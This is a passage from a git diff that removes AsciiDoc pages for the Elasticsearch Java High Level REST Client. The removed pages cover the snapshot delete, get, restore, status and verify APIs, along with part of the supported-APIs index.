The raised exception is provided as an argument - -[[java-rest-high-cluster-delete-repository-response]] -==== Snapshot Delete Repository Response - -The returned `DeleteRepositoryResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-response] --------------------------------------------------- -<1> Indicates the node has acknowledged the request diff --git a/docs/java-rest/high-level/snapshot/delete_snapshot.asciidoc b/docs/java-rest/high-level/snapshot/delete_snapshot.asciidoc deleted file mode 100644 index a594db5b602..00000000000 --- a/docs/java-rest/high-level/snapshot/delete_snapshot.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[java-rest-high-snapshot-delete-snapshot]] -=== Delete Snapshot API - -The Delete Snapshot API allows to delete a snapshot. - -[[java-rest-high-snapshot-delete-snapshot-request]] -==== Delete Snapshot Request - -A `DeleteSnapshotRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-delete-snapshot-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-delete-snapshot-async]] -==== Asynchronous Execution - -The asynchronous execution of a delete snapshot request requires both the -`DeleteSnapshotRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-execute-async] --------------------------------------------------- -<1> The `DeleteSnapshotRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteSnapshotResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. 
The raised exception is provided as an argument - -[[java-rest-high-cluster-delete-snapshot-response]] -==== Delete Snapshot Response - -The returned `DeleteSnapshotResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-response] --------------------------------------------------- -<1> Indicates the node has acknowledged the request diff --git a/docs/java-rest/high-level/snapshot/get_repository.asciidoc b/docs/java-rest/high-level/snapshot/get_repository.asciidoc deleted file mode 100644 index af006c66ab0..00000000000 --- a/docs/java-rest/high-level/snapshot/get_repository.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[[java-rest-high-snapshot-get-repository]] -=== Snapshot Get Repository API - -The Snapshot Get Repository API allows to retrieve information about a registered repository. - -[[java-rest-high-snapshot-get-repository-request]] -==== Snapshot Get Repository Request - -A `GetRepositoriesRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request-repositories] --------------------------------------------------- -<1> Sets the repositories to retrieve - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request-local] --------------------------------------------------- -<1> The `local` flag (defaults to `false`) controls whether the repositories need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-get-repository-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-get-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a snapshot get repository requires both the -`GetRepositoriesRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-execute-async] --------------------------------------------------- -<1> The `GetRepositoriesRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method 
does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetRepositoriesResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-get-repository-response]] -==== Snapshot Get Repository Response - -The returned `GetRepositoriesResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/snapshot/get_snapshots.asciidoc b/docs/java-rest/high-level/snapshot/get_snapshots.asciidoc deleted file mode 100644 index 1041f61d842..00000000000 --- a/docs/java-rest/high-level/snapshot/get_snapshots.asciidoc +++ /dev/null @@ -1,108 +0,0 @@ -[[java-rest-high-snapshot-get-snapshots]] -=== Get Snapshots API - -Use the Get Snapshot API to get snapshots. - -[[java-rest-high-snapshot-get-snapshots-request]] -==== Get Snapshots Request - -A `GetSnapshotsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request] --------------------------------------------------- - -==== Required Arguments -The following arguments are mandatory: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-repositoryName] --------------------------------------------------- -<1> The name of the repository. - -==== Optional Arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-snapshots] --------------------------------------------------- -<1> An array of snapshots to get. Otherwise it will return all snapshots for a repository. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue`. -<2> Timeout to connect to the master node as a `String`. - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-verbose] --------------------------------------------------- -<1> `Boolean` indicating if the response should be verbose. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-ignore-unavailable] --------------------------------------------------- -<1> `Boolean` indicating if unavailable snapshots should be ignored. Otherwise the request will -fail if any of the snapshots are unavailable. - -[[java-rest-high-snapshot-get-snapshots-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-get-snapshots-async]] -==== Asynchronous Execution - -The asynchronous execution of a get snapshots request requires both the -`GetSnapshotsRequest` instance and an `ActionListener` instance to be -passed as arguments to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-execute-async] --------------------------------------------------- -<1> The `GetSnapshotsRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back with the `onResponse` method -if the execution is successful or the `onFailure` method if the execution -failed. - -A typical listener for `GetSnapshotsResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of a failure. The raised exception is provided as an -argument. - -[[java-rest-high-snapshot-get-snapshots-response]] -==== Get Snapshots Response - -The returned `GetSnapshotsResponse` allows the retrieval of information about the requested -snapshots: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-response] --------------------------------------------------- -<1> The REST status of a snapshot -<2> The snapshot id -<3> The current state of the snapshot -<4> Information about failures that occurred during the shard snapshot process. -<5> The snapshot start time -<6> The snapshot end time \ No newline at end of file diff --git a/docs/java-rest/high-level/snapshot/restore_snapshot.asciidoc b/docs/java-rest/high-level/snapshot/restore_snapshot.asciidoc deleted file mode 100644 index a4b83ca419a..00000000000 --- a/docs/java-rest/high-level/snapshot/restore_snapshot.asciidoc +++ /dev/null @@ -1,144 +0,0 @@ -[[java-rest-high-snapshot-restore-snapshot]] -=== Restore Snapshot API - -The Restore Snapshot API allows to restore a snapshot. 
- -[[java-rest-high-snapshot-restore-snapshot-request]] -==== Restore Snapshot Request - -A `RestoreSnapshotRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request] --------------------------------------------------- - -==== Limiting Indices to Restore - -By default all indices are restored. With the `indices` property you can -provide a list of indices that should be restored: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-indices] --------------------------------------------------- -<1> Request that Elasticsearch only restores "test_index". - -==== Renaming Indices - -You can rename indices using regular expressions when restoring a snapshot: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-rename] --------------------------------------------------- -<1> A regular expression matching the indices that should be renamed. -<2> A replacement pattern that references the group from the regular - expression as `$1`. "test_index" from the snapshot is restored as - "restored_index" in this example. - -==== Index Settings and Options - -You can also customize index settings and options when restoring: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-index-settings] --------------------------------------------------- -<1> Use `#indexSettings()` to set any specific index setting for the indices - that are restored. -<2> Use `#ignoreIndexSettings()` to provide index settings that should be - ignored from the original indices. -<3> Set `IndicesOptions.Option.IGNORE_UNAVAILABLE` in `#indicesOptions()` to - have the restore succeed even if indices are missing in the snapshot. - -==== Further Arguments - -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-waitForCompletion] --------------------------------------------------- -<1> Boolean indicating whether to wait until the snapshot has been restored. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-partial] --------------------------------------------------- -<1> Boolean indicating whether the entire snapshot should succeed although one - or more indices participating in the snapshot don’t have all primary - shards available. 
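
For orientation, the request options covered up to this point might be combined as in the sketch
below. This is an illustrative example rather than a tested snippet; the repository, snapshot, and
index names are placeholders:

["source","java"]
--------------------------------------------------
// Hypothetical example: names are placeholders, not values from the docs tests.
RestoreSnapshotRequest request = new RestoreSnapshotRequest("my_repository", "my_snapshot");
request.indices("test_index");               // restore only this index
request.renamePattern("test_(.+)");          // rename restored indices...
request.renameReplacement("restored_$1");    // ...for example test_index -> restored_index
request.waitForCompletion(true);             // block until the restore has finished
request.partial(false);                      // fail if some primary shards are unavailable
--------------------------------------------------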
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-include-global-state] --------------------------------------------------- -<1> Boolean indicating whether restored templates that don’t currently exist - in the cluster are added and existing templates with the same name are - replaced by the restored templates. The restored persistent settings are - added to the existing persistent settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-include-aliases] --------------------------------------------------- -<1> Boolean to control whether aliases should be restored. Set to `false` to - prevent aliases from being restored together with associated indices. - -[[java-rest-high-snapshot-restore-snapshot-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-restore-snapshot-async]] -==== Asynchronous Execution - -The asynchronous execution of a restore snapshot request requires both the -`RestoreSnapshotRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-execute-async] --------------------------------------------------- -<1> The `RestoreSnapshotRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `RestoreSnapshotResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is - provided as an argument. -<2> Called in case of a failure. The raised exception is provided as an argument. - -[[java-rest-high-cluster-restore-snapshot-response]] -==== Restore Snapshot Response - -The returned `RestoreSnapshotResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-response] --------------------------------------------------- -<1> The `RestoreInfo` contains details about the restored snapshot like the indices or - the number of successfully restored and failed shards. 
diff --git a/docs/java-rest/high-level/snapshot/snapshots_status.asciidoc b/docs/java-rest/high-level/snapshot/snapshots_status.asciidoc deleted file mode 100644 index 8f91d774f4e..00000000000 --- a/docs/java-rest/high-level/snapshot/snapshots_status.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ -[[java-rest-high-snapshot-snapshots-status]] -=== Snapshots Status API - -The Snapshots Status API allows to retrieve detailed information about snapshots in progress. - -[[java-rest-high-snapshot-snapshots-status-request]] -==== Snapshots Status Request - -A `SnapshotsStatusRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request] --------------------------------------------------- - -==== Required Arguments -The following arguments must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-repository] --------------------------------------------------- -<1> Sets the repository to check for snapshot statuses - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-snapshots] --------------------------------------------------- -<1> The list of snapshot names to check the status of - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-ignoreUnavailable] --------------------------------------------------- -<1> The command will fail if some of the snapshots are unavailable. The `ignore_unavailable` flag -set to true will return all snapshots that are currently available. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-snapshots-status-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-snapshots-status-async]] -==== Asynchronous Execution - -The asynchronous execution of retrieving snapshot statuses requires both the -`SnapshotsStatusRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-execute-async] --------------------------------------------------- -<1> The `SnapshotsStatusRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. 
Once it is
-completed the `ActionListener` is called back using the `onResponse` method
-if the execution successfully completed or using the `onFailure` method if
-it failed.
-
-A typical listener for `SnapshotsStatusResponse` looks like:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-execute-listener]
---------------------------------------------------
-<1> Called when the execution is successfully completed. The response is
-provided as an argument
-<2> Called in case of a failure. The raised exception is provided as an argument
-
-[[java-rest-high-snapshot-snapshots-status-response]]
-==== Snapshots Status Response
-
-The returned `SnapshotsStatusResponse` lets you retrieve information about the
-executed operation as follows:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-response]
---------------------------------------------------
-<1> The response contains a list of snapshot statuses
-<2> Each status contains information about the snapshot
-<3> Example of reading snapshot statistics about a specific index and shard
diff --git a/docs/java-rest/high-level/snapshot/verify_repository.asciidoc b/docs/java-rest/high-level/snapshot/verify_repository.asciidoc
deleted file mode 100644
index 4f03d1e5fe3..00000000000
--- a/docs/java-rest/high-level/snapshot/verify_repository.asciidoc
+++ /dev/null
@@ -1,81 +0,0 @@
-[[java-rest-high-snapshot-verify-repository]]
-=== Snapshot Verify Repository API
-
-The Snapshot Verify Repository API lets you verify a registered repository.
-
-[[java-rest-high-snapshot-verify-repository-request]]
-==== Snapshot Verify Repository Request
-
-A `VerifyRepositoryRequest`:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-request]
---------------------------------------------------
-
-==== Optional Arguments
-The following arguments can optionally be provided:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-timeout]
---------------------------------------------------
-<1> Timeout to wait for all the nodes to acknowledge the settings were applied
-as a `TimeValue`
-<2> Timeout to wait for all the nodes to acknowledge the settings were applied
-as a `String`
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-request-masterTimeout]
---------------------------------------------------
-<1> Timeout to connect to the master node as a `TimeValue`
-<2> Timeout to connect to the master node as a `String`
-
-[[java-rest-high-snapshot-verify-repository-sync]]
-==== Synchronous Execution
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-execute]
---------------------------------------------------
-
-[[java-rest-high-snapshot-verify-repository-async]]
-==== Asynchronous Execution
-
-The asynchronous execution of a snapshot verify repository request
requires both the -`VerifyRepositoryRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-execute-async] --------------------------------------------------- -<1> The `VerifyRepositoryRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `VerifyRepositoryResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-verify-repository-response]] -==== Snapshot Verify Repository Response - -The returned `VerifyRepositoryResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/supported-apis.asciidoc b/docs/java-rest/high-level/supported-apis.asciidoc deleted file mode 100644 index 594198a51a5..00000000000 --- a/docs/java-rest/high-level/supported-apis.asciidoc +++ /dev/null @@ -1,723 +0,0 @@ -[[java-rest-high-supported-apis]] - -== Document APIs - -:upid: {mainid}-document -:doc-tests-file: {doc-tests}/CRUDDocumentationIT.java - -The Java High Level REST Client supports the following Document APIs: - -[[single-doc]] -Single document APIs:: -* <<{upid}-index>> -* <<{upid}-get>> -* <<{upid}-get-source>> -* <<{upid}-exists>> -* <<{upid}-delete>> -* <<{upid}-update>> -* <<{upid}-term-vectors>> - -[[multi-doc]] -Multi-document APIs:: -* <<{upid}-bulk>> -* <<{upid}-multi-get>> -* <<{upid}-reindex>> -* <<{upid}-update-by-query>> -* <<{upid}-delete-by-query>> -* <<{upid}-rethrottle>> -* <<{upid}-multi-term-vectors>> - -include::document/index.asciidoc[] -include::document/get.asciidoc[] -include::document/get-source.asciidoc[] -include::document/exists.asciidoc[] -include::document/delete.asciidoc[] -include::document/update.asciidoc[] -include::document/term-vectors.asciidoc[] -include::document/bulk.asciidoc[] -include::document/multi-get.asciidoc[] -include::document/reindex.asciidoc[] -include::document/update-by-query.asciidoc[] -include::document/delete-by-query.asciidoc[] -include::document/rethrottle.asciidoc[] -include::document/multi-term-vectors.asciidoc[] - - -== Search APIs - -:upid: {mainid} -:doc-tests-file: {doc-tests}/SearchDocumentationIT.java - -The Java High Level REST Client supports the following Search APIs: - -* <<{upid}-search>> -* <<{upid}-search-scroll>> -* <<{upid}-clear-scroll>> -* <<{upid}-search-template>> -* <<{upid}-multi-search-template>> -* <<{upid}-multi-search>> -* <<{upid}-field-caps>> -* 
<<{upid}-rank-eval>> -* <<{upid}-explain>> -* <<{upid}-count>> - -include::search/search.asciidoc[] -include::search/scroll.asciidoc[] -include::search/multi-search.asciidoc[] -include::search/search-template.asciidoc[] -include::search/multi-search-template.asciidoc[] -include::search/field-caps.asciidoc[] -include::search/rank-eval.asciidoc[] -include::search/explain.asciidoc[] -include::search/count.asciidoc[] - -[role="xpack"] -== Async Search APIs - -:upid: {mainid}-asyncsearch -:doc-tests-file: {doc-tests}/AsyncSearchDocumentationIT.java - -The Java High Level REST Client supports the following Async Search APIs: - -* <<{upid}-asyncsearch-submit>> -* <<{upid}-asyncsearch-get>> -* <<{upid}-asyncsearch-delete>> - -include::asyncsearch/submit.asciidoc[] -include::asyncsearch/get.asciidoc[] -include::asyncsearch/delete.asciidoc[] - -== Miscellaneous APIs - -The Java High Level REST Client supports the following Miscellaneous APIs: - -* <> -* <> -* <> -* <> - -include::miscellaneous/main.asciidoc[] -include::miscellaneous/ping.asciidoc[] -include::miscellaneous/x-pack-info.asciidoc[] -include::miscellaneous/x-pack-usage.asciidoc[] - -== Index APIs - -:upid: {mainid} -:doc-tests-file: {doc-tests}/IndicesClientDocumentationIT.java - -The Java High Level REST Client supports the following Index APIs: - -Index Management:: -* <<{upid}-analyze>> -* <<{upid}-create-index>> -* <<{upid}-delete-index>> -* <<{upid}-indices-exists>> -* <<{upid}-open-index>> -* <<{upid}-close-index>> -* <<{upid}-shrink-index>> -* <<{upid}-split-index>> -* <<{upid}-clone-index>> -* <<{upid}-refresh>> -* <<{upid}-flush>> -* <<{upid}-flush-synced>> -* <<{upid}-clear-cache>> -* <<{upid}-force-merge>> -* <<{upid}-rollover-index>> -* <<{upid}-indices-put-settings>> -* <<{upid}-get-settings>> -* <<{upid}-indices-validate-query>> -* <<{upid}-get-index>> - -Mapping Management:: -* <<{upid}-put-mapping>> -* <<{upid}-get-mappings>> -* <<{upid}-get-field-mappings>> - -Alias Management:: -* <<{upid}-update-aliases>> -* <<{upid}-exists-alias>> -* <<{upid}-get-alias>> -* <<{upid}-delete-alias>> - -Template Management:: -* <<{upid}-get-templates>> -* <<{upid}-templates-exist>> -* <<{upid}-put-template>> - -include::indices/analyze.asciidoc[] -include::indices/create_index.asciidoc[] -include::indices/delete_index.asciidoc[] -include::indices/indices_exists.asciidoc[] -include::indices/open_index.asciidoc[] -include::indices/close_index.asciidoc[] -include::indices/shrink_index.asciidoc[] -include::indices/split_index.asciidoc[] -include::indices/clone_index.asciidoc[] -include::indices/refresh.asciidoc[] -include::indices/flush.asciidoc[] -include::indices/flush_synced.asciidoc[] -include::indices/clear_cache.asciidoc[] -include::indices/force_merge.asciidoc[] -include::indices/rollover.asciidoc[] -include::indices/put_mapping.asciidoc[] -include::indices/get_mappings.asciidoc[] -include::indices/get_field_mappings.asciidoc[] -include::indices/update_aliases.asciidoc[] -include::indices/delete_alias.asciidoc[] -include::indices/exists_alias.asciidoc[] -include::indices/get_alias.asciidoc[] -include::indices/put_settings.asciidoc[] -include::indices/get_settings.asciidoc[] -include::indices/put_template.asciidoc[] -include::indices/validate_query.asciidoc[] -include::indices/get_templates.asciidoc[] -include::indices/templates_exist.asciidoc[] -include::indices/get_index.asciidoc[] -include::indices/freeze_index.asciidoc[] -include::indices/unfreeze_index.asciidoc[] -include::indices/delete_template.asciidoc[] 
-include::indices/reload_analyzers.asciidoc[] -include::indices/get_index_template.asciidoc[] -include::indices/put_index_template.asciidoc[] -include::indices/delete_index_template.asciidoc[] -include::indices/simulate_index_template.asciidoc[] - -== Cluster APIs - -The Java High Level REST Client supports the following Cluster APIs: - -* <> -* <> -* <> -* <> - -:upid: {mainid}-cluster -:doc-tests-file: {doc-tests}/ClusterClientDocumentationIT.java -include::cluster/put_settings.asciidoc[] -include::cluster/get_settings.asciidoc[] -include::cluster/health.asciidoc[] -include::cluster/remote_info.asciidoc[] -include::cluster/get_component_template.asciidoc[] -include::cluster/put_component_template.asciidoc[] -include::cluster/delete_component_template.asciidoc[] - -== Ingest APIs -The Java High Level REST Client supports the following Ingest APIs: - -* <> -* <> -* <> -* <> - -include::ingest/put_pipeline.asciidoc[] -include::ingest/get_pipeline.asciidoc[] -include::ingest/delete_pipeline.asciidoc[] -include::ingest/simulate_pipeline.asciidoc[] - -== Snapshot APIs - -The Java High Level REST Client supports the following Snapshot APIs: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -include::snapshot/get_repository.asciidoc[] -include::snapshot/create_repository.asciidoc[] -include::snapshot/delete_repository.asciidoc[] -include::snapshot/verify_repository.asciidoc[] -include::snapshot/create_snapshot.asciidoc[] -include::snapshot/get_snapshots.asciidoc[] -include::snapshot/snapshots_status.asciidoc[] -include::snapshot/delete_snapshot.asciidoc[] -include::snapshot/restore_snapshot.asciidoc[] - -== Tasks APIs - -The Java High Level REST Client supports the following Tasks APIs: - -* <> -* <> - -include::tasks/list_tasks.asciidoc[] -include::tasks/cancel_tasks.asciidoc[] - -== Script APIs - -The Java High Level REST Client supports the following Scripts APIs: - -* <> -* <> -* <> - -include::script/get_script.asciidoc[] -include::script/put_script.asciidoc[] -include::script/delete_script.asciidoc[] - -== Licensing APIs - -The Java High Level REST Client supports the following Licensing APIs: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -include::licensing/put-license.asciidoc[] -include::licensing/get-license.asciidoc[] -include::licensing/delete-license.asciidoc[] -include::licensing/start-trial.asciidoc[] -include::licensing/start-basic.asciidoc[] -include::licensing/get-trial-status.asciidoc[] -include::licensing/get-basic-status.asciidoc[] - -[role="xpack"] -== Machine Learning APIs -:upid: {mainid}-x-pack-ml -:doc-tests-file: {doc-tests}/MlClientDocumentationIT.java - -The Java High Level REST Client supports the following {ml} APIs: - -* <<{upid}-close-job>> -* <<{upid}-delete-job>> -* <<{upid}-delete-calendar-job>> -* <<{upid}-delete-calendar>> -* <<{upid}-delete-calendar-event>> -* <<{upid}-delete-data-frame-analytics>> -* <<{upid}-delete-datafeed>> -* <<{upid}-delete-expired-data>> -* <<{upid}-delete-filter>> -* <<{upid}-delete-forecast>> -* <<{upid}-delete-model-snapshot>> -* <<{upid}-delete-trained-models>> -* <<{upid}-estimate-model-memory>> -* <<{upid}-evaluate-data-frame>> -* <<{upid}-explain-data-frame-analytics>> -* <<{upid}-find-file-structure>> -* <<{upid}-flush-job>> -* <<{upid}-forecast-job>> -* <<{upid}-get-job>> -* <<{upid}-get-job-stats>> -* <<{upid}-get-buckets>> -* <<{upid}-get-calendars>> -* <<{upid}-get-calendar-events>> -* <<{upid}-get-categories>> -* <<{upid}-get-data-frame-analytics>> -* <<{upid}-get-data-frame-analytics-stats>> -* 
